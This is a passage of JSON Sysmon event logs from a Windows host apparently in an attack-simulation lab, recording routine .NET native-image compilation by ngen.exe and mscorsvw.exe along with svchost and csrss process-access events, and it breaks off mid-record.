{"EventTime":"2020-08-01 08:04:58","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6883,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:58.898\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-222A-5F25-0000-001055060B00}\r\nTargetProcessId: 4132\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:58.898","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-222A-5F25-0000-001055060B00}","TargetProcessId":"4132","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6884,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:04:59.335\r\nProcessGuid: {41C8662E-222A-5F25-0000-001055060B00}\r\nProcessId: 4132\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1024-0\\PresentationFramework.Aero2.dll\r\nCreationUtcTime: 2020-08-01 08:04:59.335","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:04:59.335","ProcessGuid":"{41C8662E-222A-5F25-0000-001055060B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1024-0\\PresentationFramework.Aero2.dll","CreationUtcTime":"2020-08-01 08:04:59.335","EventReceivedTime":"2020-08-01 08:05:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6885,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:59.382\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21F0-5F25-0000-00103E610A00}\r\nTargetProcessId: 4568\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:59.382","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21F0-5F25-0000-00103E610A00}","TargetProcessId":"4568","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6886,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:59.382\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21F0-5F25-0000-00103E610A00}\r\nTargetProcessId: 4568\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:59.382","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21F0-5F25-0000-00103E610A00}","TargetProcessId":"4568","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6887,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:59.382\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21F0-5F25-0000-00103E610A00}\r\nTargetProcessId: 4568\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:59.382","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21F0-5F25-0000-00103E610A00}","TargetProcessId":"4568","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6888,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:59.445\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-222B-5F25-0000-0010400F0B00}\r\nTargetProcessId: 2060\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:59.445","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-222B-5F25-0000-0010400F0B00}","TargetProcessId":"2060","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6889,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:59.445\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-222B-5F25-0000-0010400F0B00}\r\nTargetProcessId: 2060\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:59.445","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-222B-5F25-0000-0010400F0B00}","TargetProcessId":"2060","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6890,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:59.460\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-222B-5F25-0000-0010400F0B00}\r\nTargetProcessId: 2060\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:59.460","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-222B-5F25-0000-0010400F0B00}","TargetProcessId":"2060","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:02","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6891,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:05:02.164\r\nProcessGuid: {41C8662E-222B-5F25-0000-0010400F0B00}\r\nProcessId: 2060\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\80c-0\\Microsoft.ActiveDirectory.Management.dll\r\nCreationUtcTime: 2020-08-01 08:05:02.164","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:05:02.164","ProcessGuid":"{41C8662E-222B-5F25-0000-0010400F0B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\80c-0\\Microsoft.ActiveDirectory.Management.dll","CreationUtcTime":"2020-08-01 08:05:02.164","EventReceivedTime":"2020-08-01 08:05:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:02","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6892,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:02.226\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-222E-5F25-0000-00109D160B00}\r\nTargetProcessId: 2988\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 